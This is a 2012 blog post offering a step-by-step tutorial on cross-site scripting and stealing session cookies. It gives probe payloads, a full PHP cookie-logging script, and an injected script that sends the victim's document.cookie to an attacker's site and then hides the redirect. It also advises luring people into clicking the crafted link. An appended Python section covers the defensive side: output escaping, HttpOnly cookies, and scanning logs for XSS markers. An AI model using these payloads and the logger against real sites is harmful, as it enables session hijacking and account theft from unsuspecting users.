
Friday, June 1, 2012

XSS Attack

COOKIE:
A cookie is a small piece of data that the web browser stores for a site and sends back with every request; sites use it to hold your login session (your credentials, in effect). Without a cookie, you cannot "stay logged in" on websites.


CROSS SITE SCRIPTING:
Cross-Site Scripting (XSS) is the process of injecting JavaScript (mainly) and also HTML into a web page so that it runs in the browsers of other visitors.
- XSS attacks almost always focus on sites that use cookies to keep us logged in (storing our username and password, or the session that stands in for them).
- XSS is also used to harm the website itself (for example, defacing it).



Now the question is: how do we check whether a site is XSS vulnerable or not?
There are two methods to check this:

1. POST: http://www.target.com/search.php (we put the malicious code into the site's search form)

Code:
<script>alert("xss");</script>

2. GET: http://www.target.com/search=<script>alert("xss");</script>
We put the script directly into the URL in the browser's address bar.

What else can be injected?
-->Insert an image:



Code:
<img src="url of the image"></img>


-->Insert a message:


Code:
<b>this is hacked </b>


-->Redirect to your page:


Code:
<script>window.open( "http://www.yoursite.com/" )</script>


But the main aim of XSS is to steal cookies, so here is cookie stealing.
COOKIE STEALING TUTORIAL:



Code:

<?php

// Best-effort client address: checks proxy headers first, then REMOTE_ADDR.
function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}

// Appends one line per request (query string included) to log.txt.
function logData()
{
    $ipLog="log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_globals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['REQUEST_METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");

    // If the log file is itself an .htm/.html page, end lines with <br>.
    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
    fclose($log);
}

logData();

?>





Now, how to use this code?
This is a three-step process consisting of the injected script, the cookie recorder, and the log file.

First you'll need an account on a server, where you create two files: log.txt and giveyourname.php. You can leave log.txt empty; this is the file your cookie stealer will write to. Now paste the PHP code shown above into your cookie stealer script (giveyourname.php).
The above script will record the query string (the cookies) of every request that reaches it.



Code:
<script language= "JavaScript">document.location="http://yoursite.com/giveyourname.php?cookie=" + document.cookie;document.location="http://www.whateversite.com"</script>


Now the above code is injected into the XSS-vulnerable page via the GET or POST method. What does this code do?
It redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't know anything happened.


If this code works then you'll automatically get the cookies on your site; otherwise you have to do some hard work: grab the link you get after inserting the above script, and manually get someone to use that link if necessary. That's all at this point.

## All you need to do now is go to your website and check the log file.
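The other side of this post, as an added example that is not the post's own code: the reflected search page rendered the unsafe way and the fixed way, a session cookie set with HttpOnly so that document.cookie cannot read it, and a check over constructed access-log lines (names such as search.php, PHPSESSID and the log addresses are illustrative assumptions).

```python
import html
from http.cookies import SimpleCookie
from urllib.parse import unquote_plus

def render_search_vulnerable(query: str) -> str:
    # Echoes the search term straight into the HTML, the flaw the post's
    # search.php test relies on: <script> in the query becomes live markup.
    return f"<h1>Results for: {query}</h1>"

def render_search_hardened(query: str) -> str:
    # Fix: HTML-encode untrusted input before placing it in the page body,
    # so <script> arrives as text (&lt;script&gt;) rather than as a tag.
    return f"<h1>Results for: {html.escape(query, quote=True)}</h1>"

def session_cookie_header(session_id: str) -> str:
    # HttpOnly hides the session cookie from document.cookie, so the
    # "?cookie=" + document.cookie exfiltration carries nothing useful even
    # if an injection lands; Secure and SameSite limit where it is sent.
    cookie = SimpleCookie()
    cookie["PHPSESSID"] = session_id          # cookie name is an assumption
    cookie["PHPSESSID"]["httponly"] = True
    cookie["PHPSESSID"]["secure"] = True
    cookie["PHPSESSID"]["samesite"] = "Lax"
    return cookie.output(header="Set-Cookie:")

# Constructed access-log lines in Apache combined format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jun/2012:10:00:01 +0000] "GET /search.php?q=shoes HTTP/1.1" 200 812',
    '203.0.113.9 - - [01/Jun/2012:10:00:05 +0000] "GET /search.php?q=%3Cscript%3Ealert(%22xss%22)%3C/script%3E HTTP/1.1" 200 903',
    '203.0.113.9 - - [01/Jun/2012:10:00:09 +0000] "GET /search.php?q=%3Cscript%3Edocument.location%3D%22http://example.invalid/c.php%3Fcookie%3D%22%2Bdocument.cookie%3C/script%3E HTTP/1.1" 200 950',
]

XSS_MARKERS = ("<script", "document.cookie", "onerror=", "javascript:")

def flag_xss_probes(log_lines):
    # Detection: URL-decode each request target and look for the markers the
    # post's payloads use. Returns the raw (still encoded) targets that hit.
    hits = []
    for line in log_lines:
        parts = line.split('"')
        if len(parts) < 2:
            continue
        request = parts[1].split(" ")
        if len(request) < 2:
            continue
        target = request[1]
        if any(m in unquote_plus(target).lower() for m in XSS_MARKERS):
            hits.append(target)
    return hits
```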
